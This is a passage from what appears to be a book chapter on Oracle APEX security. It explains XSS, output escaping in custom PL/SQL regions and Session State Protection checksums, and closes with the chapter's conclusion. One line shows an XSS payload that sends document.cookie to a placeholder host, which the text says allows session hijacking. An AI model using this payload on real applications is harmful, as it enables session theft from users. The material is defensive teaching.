Figure 8-24. The Javascript alert showing all cookies
If the link were
…/f?p=4201995:2:1007199804302002::::P2_EMAIL:<script>window.location = 'http://someurl/' + document.cookie;</script>
the Javascript would navigate the browser to http://someurl with the contents of document.cookie appended
to the requested URL, so the cookie lands in that server's access log. The session cookie captured this way is
sufficient to allow an attacker to hijack the active APEX session.
By default, APEX escapes data on the way to the browser. As developers, though, we can override
this default behavior by selecting item types and report column types that do not escape data. We can
custom craft PL/SQL regions that do not escape data. Whenever we do this, we take on the burden of
ensuring that no unintended Javascript is sent to the browser.
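The following PL/SQL region source is an added example, not code from the chapter, showing the exact point at which a custom region takes on that burden. It assumes a page item named P2_EMAIL whose value arrives from the URL, and it contrasts emitting the value verbatim with escaping it on the way out:

```plsql
-- Added example (not from the chapter): a custom PL/SQL region that echoes a page item.
-- P2_EMAIL is an assumed page item; its value may have been set directly from the f?p URL.
declare
    l_email varchar2(4000) := v('P2_EMAIL');
begin
    -- Unsafe: whatever was placed in the URL, <script>...</script> included, is sent verbatim
    -- and executed by the browser. Left commented out on purpose.
    -- htp.p('Your e-mail: ' || l_email);

    -- Safe: escape on the way out so <, >, & and " reach the browser as entities
    -- (&lt; &gt; &amp; &quot;) and are displayed as text rather than parsed as markup.
    htp.p('Your e-mail: ' || sys.htf.escape_sc(l_email));

    -- On APEX 4.1 and later, apex_escape.html(l_email) is the equivalent, APEX-supplied call.
end;
```

The rule this illustrates: a custom region, an unescaped item type or a "Standard Report Column" that is not set to escape special characters all bypass the framework's default escaping, so every value concatenated into htp.p output must be escaped explicitly unless it was generated by the application itself and never touched user input.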
The discussion above naturally leads to the topic of URL tampering. Because APEX carries page, session and
item values in the f?p URL, editing that URL is one of the easiest ways for someone to see what mischief can
be done in your application. APEX developers can minimize URL tampering by enabling Session State
Protection (SSP) on an application: with SSP on, a URL that sets a protected item or requests a protected page
must carry a checksum generated by APEX, and a URL whose values have been altered fails the checksum and
is rejected. Not all applications will benefit from SSP, and it has some small drawbacks (every link that sets a
protected item must be generated by APEX or by apex_util.prepare_url rather than written by hand), but it
should be considered for any application in which URL tampering is a concern. Please see the APEX
documentation for more information on SSP.
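As an added example that is not from the chapter, this is how a link to the page above would be built once SSP is enabled and P2_EMAIL is set to "Checksum Required - Session Level". It assumes page 2 and the item P2_EMAIL from the earlier URL, and that the code runs inside an APEX session where the :APP_ID and :APP_SESSION binds are available:

```plsql
-- Added example (not from the chapter): building a link that survives Session State Protection.
-- apex_util.prepare_url appends the checksum (&cs=...) that SSP requires; any later edit to the
-- P2_EMAIL value in the URL no longer matches the checksum and APEX rejects the request.
declare
    l_url varchar2(4000);
begin
    l_url := apex_util.prepare_url(
                 p_url           => 'f?p=' || :APP_ID || ':2:' || :APP_SESSION
                                    || '::NO::P2_EMAIL:'
                                    || apex_util.url_encode('alice@example.com'),  -- constructed sample value
                 p_checksum_type => 'SESSION');

    -- The URL is itself output, so it is escaped before being placed in the href attribute.
    htp.p('<a href="' || sys.htf.escape_sc(l_url) || '">Edit e-mail</a>');
end;
```

The checksum type 'SESSION' binds the link to the current session; 'PRIVATE_BOOKMARK' and 'PUBLIC_BOOKMARK' produce checksums that remain valid across sessions for the same user or for any user respectively, which is what bookmarkable links need.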
Conclusion
For most, the Web is a wonderful, even magical place. Twenty years ago few would have imagined its
reach and ability to speed commerce, enlighten students, and even foment revolution. It is the
responsibility of developers to keep it that way, guarding our users from dangers they have yet to
imagine. Oracle Application Express is a powerful web application framework that provides a wealth of
features and security. Like any tool, though, it must be handled with care.
Wikileaks, Mastercard, and Visa were all victims of the basic architecture of web servers, which exist to
provide content rapidly to anyone who requests it. Many bystanders were inconvenienced by the slowdown
of networks under the vast amounts of traffic that a small number of ever faster home computers, hijacked
into a botnet, can generate. The nature of the Internet, which allows computers to interact based upon open
standards, carries with it the possibility of intrusion. Understanding the basic principles of how the Internet
works, how browsers and web servers communicate, and how this communication can be exploited, is key to
building robust, secure applications.
APEX provides a great platform to exploit what is best about the Internet and about Oracle—the ability
to rapidly share information. APEX has many more features than discussed in this chapter for doing so
securely. I have had the great pleasure of working with APEX developers, especially Scott Spadafore, on
these and many other topics. Thanks to them and to the APEX community.